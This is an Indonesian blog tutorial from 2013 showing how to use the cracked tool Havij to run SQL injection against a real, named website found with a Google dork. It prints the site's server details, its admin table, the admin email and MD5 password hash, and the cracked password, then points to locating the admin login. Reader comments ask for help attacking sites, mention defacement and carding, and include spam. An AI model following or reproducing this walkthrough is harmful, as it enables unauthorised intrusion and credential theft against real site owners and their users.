Now Trending:

Tutorial SQL Injection Menggunakan Tools Havij

February 19, 2013 SQL Injection 52 Comments

Kemarn saya sudah share Tools Havij 1.15 Pro version [Cracked] . Kali ini saya akan share cara menggunakan Havij tersebut untuk menemukan password web target dengan SQLi .
Oke, langsung saja kita mulai ritualnya :

Pertama, cari target lewat google dork.

Google Dork : inurl:”pages.php?id=”

Lalu kita pilih salah satu target. Untuk percobaan, saya pilih target : http://www.radiesse-voice.com/pages.php?id=15

Maka kita akan mendapat data-data sebagai berikut :

Kita masukkan alamat tersebut ke kolom target yang ada di Havij lalu klik analyze . tungu sampai kolom paling bawah bertuliskan Status : I’m IDLE

Host IP: 65.98.217.75
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.17
Keyword Found: Billing
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 7
Valid String Column is 3
Current DB: radiesse

Oke, lanjut ke step 2 : Klik Tables lalu kik Get Tables

Maka akan keluar kolom baru yaitu rad_admin, rad_news, rad_page . Karena kita ingin mencari akses admin, kita coba kolom rad_admin. centang kolom rad_admin lalu klik get columns

Setelah selesai, kita lihat di kolom bawah. Kita mendapatkan data sebagai berikut : 

Data Found: admin_id,admin_email,admin_pass=1^[email protected]^f97c5d29941bfb1b2fdab0874906ab82

Oke, hampir berhasil. Kita menemukan kolom : admin_id, admin_email, admin_pass, admin_passo
Kita coba lihat isi dari admin_id , admin_email, admin_pass . Centang admin_id , admin_email, admin_pass lalu klik get data

Admin ID : 1
Admin Email : [email protected]
Admin Password : f97c5d29941bfb1b2fdab0874906ab82
Namun password belum di encrypt. Maka kita encrypt menggunakan fitur MD5.
Dan kita mendapatkan data sebagai berikut : Plain text of f97c5d29941bfb1b2fdab0874906ab82 is one . Jadi passwordnya adalah one.
Sampai disini semua beres. Tinggal nyari admin loginnya. Karena ini butuh waktu yang lama, cari sendiri-sendiri aja ya Admin Loginnya. Gunakan Fitur Find Admin
Oke, sekian tutorial kali ini, selamat mencoba.
Shares

Related Posts

About The Author

Yoo Cherry

sysadmin / blogger / geek / ubuntu user

Tags:

52 Comments

  1. Naufal Hanif Rabbani February 19, 2013 Reply

    keren sob 🙂

  2. BlogS of Hariyanto February 19, 2013 Reply

    waduh…lagi-lagi saya hanya bisa duduk manis mencoba menyimak aoa yang tertulis disini 🙂

  3. putra February 19, 2013 Reply

    ini pasti di forum itu tuh .. heheh… saya kemarin tau yang seperti ini soalnya 😀

    • chiaki February 20, 2013 Reply

      Kalo ini sih di semua forum ada. Basic nya. Hehehe

  4. Alt-Amiend February 20, 2013 Reply

    menyapa pagi kesini kawan….

  5. Imtikhan.Com February 20, 2013 Reply

    patut dipelajari sob
    izin simpan ya 🙂

  6. Masnady February 20, 2013 Reply

    wah saya suport saja dech sobat, masih belum paham beginian nih.. ntr kalau saya dah beli kompi, saya minta ajarin beginian sama sobat..

    awas ya kalau nggak mau ngajarin hahahahahahaha

  7. Brebes VS Lamongan February 20, 2013 Reply

    met pagi nyimak bang soalnya belom punya tuh programnya hehehe

    • chiaki February 20, 2013 Reply

      Di artikel sebelumnya ada. :v

  8. budi os 19 February 20, 2013 Reply

    mantabbb nih sobat…kash infonya 🙂
    lanjuttt kan…hehe

  9. Rohis Facebook February 20, 2013 Reply

    aduh ampun.., lengkap banget sob… *smile

  10. Bung Penho February 20, 2013 Reply

    waduh makin membingungkan yud. tetapi oke buat pelajaran baru nih!

    • chiaki February 21, 2013 Reply

      Hehehe. Ini mah baru basic.

  11. Lanonadio February 21, 2013 Reply

    pusing mas sumpah hehehe

    • chiaki February 22, 2013 Reply

      :v

    • Ipnul Haq September 20, 2015 Reply

      Bro boleh tau gmail kamu gak bro? Biar aku bisa kontak kamu bro tutorial carding lebih lanjut

  12. Ilmu Dunia dan Akhirat April 3, 2013 Reply

    saya coba dulu ya gan defacenya.. 🙂

  13. Andika yuda pratama April 30, 2013 Reply

    bang kan ane udh dapet pass nya, nyari tempat admin login dimana ???

  14. Dedy muswar May 4, 2013 Reply

    waktu encrypt pass gk bisa gan hasilnya masih bil hash

  15. Majalah Siantar May 5, 2013 Reply

    mantaplah, tapi ga semua web bisa dijeboll

  16. Koh Lee Van Djocdja May 10, 2013 Reply

    Lanjutkan pakde….. 🙂

  17. Sekedar Info May 23, 2013 Reply

    admin loginnya ada dimana gan ????

    #bingung tingkat dewa neh…

  18. Tiooo June 28, 2013 Reply

    Biar tau itu web bisa di hack darimananya min?

  19. ~uchanet~ July 9, 2013 Reply

    gan biasanya klo ngak nemu db (unknown) itu apanya yah…

  20. Anonim July 9, 2013 Reply

    md5 hash ya… yg masalah kalo password nya tdk ada dalam hash :v

  21. Seftian July 25, 2013 Reply

    makasih bang yuyud..
    ane seftian.. yang dlu..
    tp keren.. gw salut, soalnya ini d bahas secara detail (y)

  22. Anonim August 3, 2013 Reply

    bang cara login pke usernamenya gimana?
    kan kita cuma punya emailnya

  23. Anonim August 4, 2013 Reply

    wani piro xixixixixixixixixi

  24. Anonim September 18, 2013 Reply

    copas beroh
    sumber tercantum :3

  25. optimizer jakarta November 4, 2013 Reply

    test ah 🙂

  26. Anonim November 12, 2013 Reply

    ka tolong bantu gmn cara kita tau pages.php?id=15 saya udh cari di google dork ga ada terus saya coba ganti dengan angka lain ketika di analyze eror 404.jd gmn cara kita tau php?id suata website .thanks before

  27. Anonim November 13, 2013 Reply

    greattttt men

  28. Azmi Hauzan Hazairin November 16, 2013 Reply

    ko saya ada TULISAN

    "Component 'tabctl32.ocx' blablablablablablablablablablablablablablablablablablablablablablablablabla

    • shinta January 22, 2014 Reply

      "run as administrator" gan

  29. Mahfud December 9, 2013 Reply

    kenapa tu bang halaman depan printscreen kok ada tulisan merah madura ciber. kenapa gambar yg lain kok gak ada.

    jangan2 abang juga Copas

  30. Tilis Tiadi December 10, 2013 Reply

    gan klw yang ini /pages.php?id=15 maksudnya apanya tuh gan?
    trus klw cara ngedapetinnya gimana? mohon bimbingannya gan. (newbie)

  31. Anonim March 28, 2014 Reply

    F*ck lu copas punya web orang

  32. Anonim April 13, 2014 Reply

    Oh my goodness! Incredible article dude! Many thanks, However I am encountering problems with your RSS.
    I don't understand the reason why I am unable to join it.
    Is there anybody else getting the same RSS problems? Anyone that knows the
    answer can youu kindky respond? Thanks!!

    Stop byy myy website :: post divorce advice for men

  33. Ahmad Wahyudin January 7, 2015 Reply

    segera miliki rumah tahan gempa desain klasik, menarik dgn suasana pedesaan yang eksotik. tersedia berbagai macam model
    rumah jawa seperti
    rumah joglo
    rumah limasan
    rumah kampung. kami juga menjual
    gebyok kayu jati lawas

  34. ahmad wahyudin March 19, 2015 Reply

    jangan biarkan kulit keriput, jerawat dan bisul-bisul mengganggu penampilan anda, segera obati dengan gluta drink.
    manfaat susu gluta drink sudah terbukti nyata dan gluta drink yang asli hanya bisa anda dapatkan di
    distributor gluta drink yogyakarta

  35. Anonim March 20, 2015 Reply

    Waspada kanker serviks! jangan anggap sepele masalah keputihan anda, bisa jadi keputihan yang berlebih adalah gejala kanker serviks.
    berikut ini adalah cara mengobati keputihan dengan crystal x asli.

Leave a Reply